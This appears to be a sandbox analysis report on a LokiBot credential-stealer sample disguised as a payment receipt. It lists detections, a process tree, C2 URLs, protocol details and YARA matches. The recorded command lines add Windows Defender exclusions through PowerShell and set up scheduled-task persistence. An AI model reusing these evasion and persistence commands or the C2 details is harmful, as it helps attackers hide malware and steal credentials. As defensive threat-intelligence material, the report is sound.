Edit tour

Windows Analysis Report
Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe

Overview

General Information

Sample name:	Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe
Analysis ID:	1630121
MD5:	5a4fc3780cfc0527d12d8bb5134a81f5
SHA1:	de3a05f3e410bb8b30e0b4d8ee32a3dcccbd2837
SHA256:	92e6e90dd6fb4cd89fa077cde338876ccab7aea58cd213838be250ed83eb0247
Tags:	exeLokiuser-James_inthe_box
Infos:

Detection

Lokibot

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Sigma detected: Scheduled temp file as task from temp location

Suricata IDS alerts for network traffic

Yara detected AntiVM3

Yara detected Lokibot

.NET source code contains potential unpacker

Adds a directory exclusion to Windows Defender

C2 URLs / IPs found in malware configuration

Initial sample is a PE file and has a suspicious name

Injects a PE file into a foreign processes

Joe Sandbox ML detected suspicious sample

Loading BitLocker PowerShell Module

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file / registry access)

Tries to steal Mail credentials (via file registry)

Uses schtasks.exe or at.exe to add and modify task schedules

Yara detected aPLib compressed binary

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates processes with suspicious names

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Powershell Defender Exclusion

Sigma detected: Suspicious Add Scheduled Task Parent

Sigma detected: Suspicious Schtasks From Env Var Folder

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Yara signature match

Classification

Process Tree

System is w10x64

Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe (PID: 5100 cmdline: "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe" MD5: 5A4FC3780CFC0527D12D8BB5134A81F5)

powershell.exe (PID: 5668 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 4208 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 1220 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\euKeoTytdT.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)

conhost.exe (PID: 6492 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 7392 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

schtasks.exe (PID: 6596 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp5805.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe (PID: 7196 cmdline: "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe" MD5: 5A4FC3780CFC0527D12D8BB5134A81F5)

Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe (PID: 7208 cmdline: "C:\Users\user\Desktop\Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe" MD5: 5A4FC3780CFC0527D12D8BB5134A81F5)

euKeoTytdT.exe (PID: 7252 cmdline: C:\Users\user\AppData\Roaming\euKeoTytdT.exe MD5: 5A4FC3780CFC0527D12D8BB5134A81F5)

schtasks.exe (PID: 7512 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\euKeoTytdT" /XML "C:\Users\user\AppData\Local\Temp\tmp707F.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)

conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

euKeoTytdT.exe (PID: 7580 cmdline: "C:\Users\user\AppData\Roaming\euKeoTytdT.exe" MD5: 5A4FC3780CFC0527D12D8BB5134A81F5)

euKeoTytdT.exe (PID: 7588 cmdline: "C:\Users\user\AppData\Roaming\euKeoTytdT.exe" MD5: 5A4FC3780CFC0527D12D8BB5134A81F5)

euKeoTytdT.exe (PID: 7596 cmdline: "C:\Users\user\AppData\Roaming\euKeoTytdT.exe" MD5: 5A4FC3780CFC0527D12D8BB5134A81F5)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Loki Password Stealer (PWS), LokiBot	"Loki Bot is a commodity malware sold on underground sites which is designed to steal private data from infected machines, and then submit that info to a command and control host via HTTP POST. This private data includes stored passwords, login credential information from Web browsers, and a variety of cryptocurrency wallets." - PhishMeLoki-Bot employs function hashing to obfuscate the libraries utilized. While not all functions are hashed, a vast majority of them are.Loki-Bot accepts a single argument/switch of -u that simply delays execution (sleeps) for 10 seconds. This is used when Loki-Bot is upgrading itself.The Mutex generated is the result of MD5 hashing the Machine GUID and trimming to 24-characters. For example: B7E1C2CC98066B250DDB2123.Loki-Bot creates a hidden folder within the %APPDATA% directory whose name is supplied by the 8th thru 13th characters of the Mutex. For example: %APPDATA%\ C98066\.There can be four files within the hidden %APPDATA% directory at any given time: .exe, .lck, .hdb and .kdb. They will be named after characters 13 thru 18 of the Mutex. For example: 6B250D. Below is the explanation of their purpose:FILE EXTENSIONFILE DESCRIPTION.exeA copy of the malware that will execute every time the user account is logged into.lckA lock file created when either decrypting Windows Credentials or Keylogging to prevent resource conflicts.hdbA database of hashes for data that has already been exfiltrated to the C2 server.kdbA database of keylogger data that has yet to be sent to the C2 serverIf the user is privileged, Loki-Bot sets up persistence within the registry under HKEY_LOCAL_MACHINE. If not, it sets up persistence under HKEY_CURRENT_USER.The first packet transmitted by Loki-Bot contains application data.The second packet transmitted by Loki-Bot contains decrypted Windows credentials.The third packet transmitted by Loki-Bot is the malware requesting C2 commands from the C2 server. By default, Loki-Bot will send this request out every 10 minutes after the initial packet it sent.Communications to the C2 server from the compromised host contain information about the user and system including the username, hostname, domain, screen resolution, privilege level, system architecture, and Operating System.The first WORD of the HTTP Payload represents the Loki-Bot version.The second WORD of the HTTP Payload is the Payload Type. Below is the table of identified payload types:BYTEPAYLOAD TYPE0x26Stolen Cryptocurrency Wallet0x27Stolen Application Data0x28Get C2 Commands from C2 Server0x29Stolen File0x2APOS (Point of Sale?)0x2BKeylogger Data0x2CScreenshotThe 11th byte of the HTTP Payload begins the Binary ID. This might be useful in tracking campaigns or specific threat actors. This value value is typically ckav.ru. If you come across a Binary ID that is different from this, take note!Loki-Bot encrypts both the URL and the registry key used for persistence using Triple DES encryption.The Content-Key HTTP Header value is the result of hashing the HTTP Header values that precede it. This is likely used as a protection against researchers who wish to poke and prod at Loki-Bots C2 infrastructure.Loki-Bot can accept the following instructions from the C2 Server:BYTEINSTRUCTION DESCRIPTION0x00Download EXE & Execute0x01Download DLL & Load #10x02Download DLL & Load #20x08Delete HDB File0x09Start Keylogger0x0AMine & Steal Data0x0EExit Loki-Bot0x0FUpgrade Loki-Bot0x10Change C2 Polling Frequency0x11Delete Executables & ExitSuricata SignaturesRULE SIDRULE NAME2024311ET TROJAN Loki Bot Cryptocurrency Wallet Exfiltration Detected2024312ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M12024313ET TROJAN Loki Bot Request for C2 Commands Detected M12024314ET TROJAN Loki Bot File Exfiltration Detected2024315ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M12024316ET TROJAN Loki Bot Screenshot Exfiltration Detected2024317ET TROJAN Loki Bot Application/Credential Data Exfiltration Detected M22024318ET TROJAN Loki Bot Request for C2 Commands Detected M22024319ET TROJAN Loki Bot Keylogger Data Exfiltration Detected M2	SWEED The Gorgon Group Cobalt	http://blog.reversing.xyz/reversing/2021/06/08/lokibot.html http://reversing.fun/posts/2021/06/08/lokibot.html http://reversing.fun/reversing/2021/06/08/lokibot.html http://www.malware-traffic-analysis.net/2017/06/12/index.html https://0xmrmagnezi.github.io/malware%20analysis/LokiBot/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lokipws

Malware Configuration

Threatname: Lokibot

{"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php"]}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security

Memory Dumps

Source	Rule	Description	Author	Strings
0000000A.00000002.3429388414.00000000010D8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17ca4:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5057:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.2228686790.0000000002A3E000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1389b:$des3: 68 03 66 00 00 0x17ca4:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x17d70:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18258:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5623:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.2289569837.00000000040D1000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13e67:$des3: 68 03 66 00 00 0x18258:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x18324:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17550:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x491b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.2229898655.0000000003A47000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1315f:$des3: 68 03 66 00 00 0x17550:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1761c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x18238:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5603:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.2289569837.00000000040B7000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13e47:$des3: 68 03 66 00 00 0x18238:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x18304:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x189d0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x5d83:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
0000000B.00000002.2286478638.00000000030AE000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x145c7:$des3: 68 03 66 00 00 0x189d0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x18a9c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x187f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x53bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Loki_1	Loki Payload	kevoreilly	0x151b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x153fc:$a2: last_compatible_version
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x13bff:$des3: 68 03 66 00 00 0x187f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x188bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
00000011.00000002.2265215061.0000000000400000.00000040.00000400.00020000.00000000.sdmp	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x17936:$f1: FileZilla\recentservers.xml 0x17976:$f2: FileZilla\sitemanager.xml 0x15be6:$b2: Mozilla\Firefox\Profiles 0x15950:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x15afa:$s4: logins.json 0x169a4:$s6: wand.dat 0x15424:$a1: username_value 0x15414:$a2: password_value 0x15a5f:$a3: encryptedUsername 0x15acc:$a3: encryptedUsername 0x15a72:$a4: encryptedPassword 0x15ae0:$a4: encryptedPassword
00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x17570:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x493b:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
00000001.00000002.2229898655.0000000003A61000.00000004.00000800.00020000.00000000.sdmp	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x1317f:$des3: 68 03 66 00 00 0x17570:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x1763c:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 5100	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0xc289:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x50626:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x8cef8:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe PID: 7208	JoeSecurity_Lokibot_1	Yara detected Lokibot	Joe Security
Process Memory Space: euKeoTytdT.exe PID: 7252	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: euKeoTytdT.exe PID: 7252	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: euKeoTytdT.exe PID: 7252	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x26aed:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x29997:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk 0x32658:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Process Memory Space: euKeoTytdT.exe PID: 7596	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
Process Memory Space: euKeoTytdT.exe PID: 7596	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
Process Memory Space: euKeoTytdT.exe PID: 7596	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x6a3c:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
Click to see the 51 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.raw.unpack	INDICATOR_SUSPICIOUS_GENInfoStealer	Detects executables containing common artifcats observed in infostealers	ditekSHen	0x16536:$f1: FileZilla\recentservers.xml 0x16576:$f2: FileZilla\sitemanager.xml 0x147e6:$b2: Mozilla\Firefox\Profiles 0x14550:$b3: Software\Microsoft\Internet Explorer\IntelliForms\Storage2 0x146fa:$s4: logins.json 0x155a4:$s6: wand.dat 0x14024:$a1: username_value 0x14014:$a2: password_value 0x1465f:$a3: encryptedUsername 0x146cc:$a3: encryptedUsername 0x14672:$a4: encryptedPassword 0x146e0:$a4: encryptedPassword
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a61180.2.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.euKeoTytdT.exe.40b7e48.3.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.euKeoTytdT.exe.40b7e48.3.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.euKeoTytdT.exe.40b7e48.3.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.euKeoTytdT.exe.40b7e48.3.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
11.2.euKeoTytdT.exe.40b7e48.3.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x15ff0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x3bbb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack	Loki_1	Loki Payload	kevoreilly	0x131b4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x133fc:$a2: last_compatible_version
1.2.Payment receipt PO 1437 1_ Payment receipt PO #1437 2.exe.3a47160.4.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x123ff:$des3: 68 03 66 00 00 0x15ff0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x160bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	JoeSecurity_Lokibot	Yara detected Lokibot	Joe Security
11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	JoeSecurity_aPLib_compressed_binary	Yara detected aPLib compressed binary	Joe Security
11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	Windows_Trojan_Lokibot_1f885282	unknown	unknown	0x173f0:$a1: MAC=%02X%02X%02XINSTALL=%08X%08Xk
11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	Windows_Trojan_Lokibot_0f421617	unknown	unknown	0x47bb:$a: 08 8B CE 0F B6 14 38 D3 E2 83 C1 08 03 F2 48 79 F2 5F 8B C6
11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	Loki_1	Loki Payload	kevoreilly	0x13db4:$a1: DlRycq1tP2vSeaogj5bEUFzQiHT9dmKCn6uf7xsOY0hpwr43VINX8JGBAkLMZW 0x13ffc:$a2: last_compatible_version
11.2.euKeoTytdT.exe.40b7e48.3.raw.unpack	Lokibot	detect Lokibot in memory	JPCERT/CC Incident Response Group	0x12fff:$des3: 68 03 66 00 00 0x173f0:$param: MAC=%02X%02X%02XINSTALL=%08X%08X 0x174bc:$string: 2D 00 75 00 00 00 46 75 63 6B 61 76 2E 72 75 00 00
